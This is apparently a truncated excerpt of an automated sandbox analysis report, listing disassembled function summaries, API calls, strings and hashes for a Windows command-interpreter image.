                                                                                      • API String ID: 1103618819-1745581171
                                                                                      • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                      • Instruction ID: cfee13a5c693ba0bbda19f0cceb9b10cbe74937702e296b2ade4766c0f00dd46
                                                                                      • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                      • Instruction Fuzzy Hash: E741B362A08F82C2EAA0AF2194A0279B7E4FB4DB95FC54235DE4D63395EF3CE441C710
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: memset$_wcslwr
                                                                                      • String ID: [%s]
                                                                                      • API String ID: 886762496-302437576
                                                                                      • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                      • Instruction ID: 5214cc194e3d8e705c60ffce3d4627382e07c30328f736a98f2f81a944eb1d64
                                                                                      • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                      • Instruction Fuzzy Hash: 3D318B32705B8285EBB1EF21D8943E9A7A8FB8CB88F844135CA8D5B755DF3CE6458310
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937533A8: iswspace.MSVCRT(?,?,00000000,00007FF79376D6EE,?,?,?,00007FF793760632), ref: 00007FF7937533C0
                                                                                      • iswspace.MSVCRT(?,?,?,00007FF7937532A4), ref: 00007FF79375331C
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: iswspace
                                                                                      • String ID: off
                                                                                      • API String ID: 2389812497-733764931
                                                                                      • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                      • Instruction ID: 0c86a218f7ea6e4159dcb68840ae0cf75a8cef2dcab79c2ba11b53070bead396
                                                                                      • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                      • Instruction Fuzzy Hash: DC21AE21E0C64281FAF87B359494379E698EF5DB80FCC8036D94E627A0DE2CE5409371
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                      • String ID: %s=%s$DPATH$PATH
                                                                                      • API String ID: 3731854180-3148396303
                                                                                      • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                      • Instruction ID: 399a3cc95dc2a179be65de987111658aa8f0b402d8f7cbae6eb27fd21f1a1421
                                                                                      • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                      • Instruction Fuzzy Hash: 79218321B09A5280FBB4AB76E4D0279E269AF8DB84FC44135C90E67395DE2CE4418360
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: wcscmp
                                                                                      • String ID: *.*$????????.???
                                                                                      • API String ID: 3392835482-3870530610
                                                                                      • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                      • Instruction ID: 2685e43eea88870a81fa86f84bdca02e9391c934bf42be29cf5110bcaf27548c
                                                                                      • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                      • Instruction Fuzzy Hash: 5A11C625B14B5252E7F8AB36E480139B6A4FB4CB80F985032CE8E67B45DE3DE8418710
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: fprintf
                                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                                      • API String ID: 383729395-2781220306
                                                                                      • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                      • Instruction ID: c7961abc95c87a63e168d8f52d4caa0070f87552e671f145ac7facd0a327d36d
                                                                                      • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                      • Instruction Fuzzy Hash: 5611C42190894291EBB9AB34D9940B9A26AEB4D7F4FD04332D57E632E4DF2CE841C361
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: iswspacewcschr
                                                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                      • API String ID: 287713880-1183017076
                                                                                      • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                      • Instruction ID: b53f091fbe030538e447fdfcc5512103197dee64f53fa6259f4d5a39d38a41f4
                                                                                      • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                      • Instruction Fuzzy Hash: C8F04421A1965281FAB89B21A4C017AE594FF4EF41FC99132D95E66354DF2CD444C660
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                      • API String ID: 1646373207-2530943252
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: RaiseFailFastException$kernelbase.dll
                                                                                      • API String ID: 1646373207-919018592
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$CurrentDirectorytowupper
                                                                                      • String ID:
                                                                                      • API String ID: 1403193329-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmp$wcschr
                                                                                      • String ID:
                                                                                      • API String ID: 3270668897-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$DriveFullNamePathType
                                                                                      • String ID:
                                                                                      • API String ID: 3442494845-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                      • String ID:
                                                                                      • API String ID: 140117192-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcstol$lstrcmp
                                                                                      • String ID:
                                                                                      • API String ID: 3515581199-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: File_get_osfhandle$TimeWrite
                                                                                      • String ID:
                                                                                      • API String ID: 4019809305-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$DriveNamePathTypeVolume
                                                                                      • String ID:
                                                                                      • API String ID: 1029679093-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 2448200120-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1617791916-0
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793753C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF793753D0C
                                                                                        • Part of subcall function 00007FF793753C24: towupper.MSVCRT ref: 00007FF793753D2F
                                                                                        • Part of subcall function 00007FF793753C24: iswalpha.MSVCRT ref: 00007FF793753D4F
                                                                                        • Part of subcall function 00007FF793753C24: towupper.MSVCRT ref: 00007FF793753D75
                                                                                        • Part of subcall function 00007FF793753C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793753DBF
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79376EA0F,?,?,?,00007FF79376E925,?,?,?,?,00007FF79374B9B1), ref: 00007FF793746ABF
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF793746AD3
                                                                                        • Part of subcall function 00007FF793746B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF793746AE8,?,?,?,00007FF79376EA0F,?,?,?,00007FF79376E925), ref: 00007FF793746B8B
                                                                                        • Part of subcall function 00007FF793746B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF793746AE8,?,?,?,00007FF79376EA0F,?,?,?,00007FF79376E925), ref: 00007FF793746B97
                                                                                        • Part of subcall function 00007FF793746B84: RtlFreeHeap.NTDLL ref: 00007FF793746BAF
                                                                                        • Part of subcall function 00007FF793746B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793746AF1,?,?,?,00007FF79376EA0F,?,?,?,00007FF79376E925), ref: 00007FF793746B39
                                                                                        • Part of subcall function 00007FF793746B30: RtlFreeHeap.NTDLL ref: 00007FF793746B4D
                                                                                        • Part of subcall function 00007FF793746B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793746AF1,?,?,?,00007FF79376EA0F,?,?,?,00007FF79376E925), ref: 00007FF793746B59
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79376EA0F,?,?,?,00007FF79376E925,?,?,?,?,00007FF79374B9B1), ref: 00007FF793746B03
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF793746B17
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                      • String ID:
                                                                                      • API String ID: 3512109576-0
                                                                                      • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                      • Instruction ID: 428d864bd8bd42915d852bdaaddcc61e35cd3b6781fd0fd09ead1e1ade2e0d31
                                                                                      • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                      • Instruction Fuzzy Hash: 5021E221A08A8286FBA4BB35D4D43B8BBA5EF5DB45F944035CA0E23351DF3CA445C771
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374AF82), ref: 00007FF79374B6D0
                                                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374AF82), ref: 00007FF79374B6E7
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374AF82), ref: 00007FF79374B701
                                                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374AF82), ref: 00007FF79374B715
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$AllocSize
                                                                                      • String ID:
                                                                                      • API String ID: 2549470565-0
                                                                                      • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                      • Instruction ID: 9c73781ac816377fb18e8d3ca9a9e0f8688c92737143333082316fa1b22bb65f
                                                                                      • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                      • Instruction Fuzzy Hash: BE21682590978286FAA5AB35E5C4078F6E9FB4CB81BC89436DA4E23750DF3CE941C720
                                                                                      APIs
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D01C
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D033
                                                                                      • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D06D
                                                                                      • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D07F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                      • String ID:
                                                                                      • API String ID: 1033415088-0
                                                                                      • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                      • Instruction ID: 55458762fe394f7b4b5b63179219d260baa1e86831a1c97bf7380498bc13a5f6
                                                                                      • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                      • Instruction Fuzzy Hash: 6411B231618A4287EB949B30F09417AF7A4FB8EB95F805135EA8F57B94DF3CD0458B60
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793751EA0: wcschr.MSVCRT(?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF793770D54), ref: 00007FF793751EB3
                                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793745A2E
                                                                                      • _open_osfhandle.MSVCRT ref: 00007FF793745A4F
                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF79374260D), ref: 00007FF7937637AA
                                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7937637D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                      • String ID:
                                                                                      • API String ID: 22757656-0
                                                                                      • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                      • Instruction ID: f3b49ae40ab725ce03d42889daa5e0ccaddb7305bae61101b0deca79f7ae686a
                                                                                      • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                      • Instruction Fuzzy Hash: 8A115E71A146458BF7A06B34E4C8379AAA4EB8DB75FA44734D62A073D0CF3CD5498B20
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF793765433,?,?,?,00007FF7937669B8,?,?,?,?,?,00007FF793758C39), ref: 00007FF7937656C5
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF7937656D9
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF793765433,?,?,?,00007FF7937669B8,?,?,?,?,?,00007FF793758C39), ref: 00007FF7937656FD
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF793765711
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$FreeProcess
                                                                                      • String ID:
                                                                                      • API String ID: 3859560861-0
                                                                                      • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                      • Instruction ID: 5a03dd05a9e9c318ce3d11853833e6990a13efd7dbd890b12220da3e4d03e6f2
                                                                                      • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                      • Instruction Fuzzy Hash: E5114C72A04B81C6EB109F66E4840ACBBB4F74DF85B888125DB4E13718DF38E556CB90
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                      • String ID:
                                                                                      • API String ID: 140117192-0
                                                                                      • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                      • Instruction ID: d2509909780553d24f62160a4af5d2e24403275edabd377d689c316eb0b647d4
                                                                                      • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                      • Instruction Fuzzy Hash: 7B21F435A08B41C1E7A0AB24F8C0369B7A8FB8D745F900036DA8E63764DF7CE445C720
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793748798), ref: 00007FF793754AD6
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793748798), ref: 00007FF793754AEF
                                                                                        • Part of subcall function 00007FF793754A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A28
                                                                                        • Part of subcall function 00007FF793754A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A66
                                                                                        • Part of subcall function 00007FF793754A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A7D
                                                                                        • Part of subcall function 00007FF793754A14: memmove.MSVCRT(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A9A
                                                                                        • Part of subcall function 00007FF793754A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754AA2
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793748798), ref: 00007FF79375EE64
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF79375EE78
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                      • String ID:
                                                                                      • API String ID: 2759988882-0
                                                                                      • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                      • Instruction ID: 5de7056080f00e2e662a0390ca99d76782414ecfabfae58d30bbe00afe527b89
                                                                                      • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                      • Instruction Fuzzy Hash: 4BF06820A19B8287FFA4677594841B8E9E5FF8EB42F889034CD0F52340EF3CA5048771
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                                      • String ID:
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                        • Part of subcall function 00007FF79374CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF79376827A), ref: 00007FF7937711DC
                                                                                      • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF79376827A), ref: 00007FF793771277
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
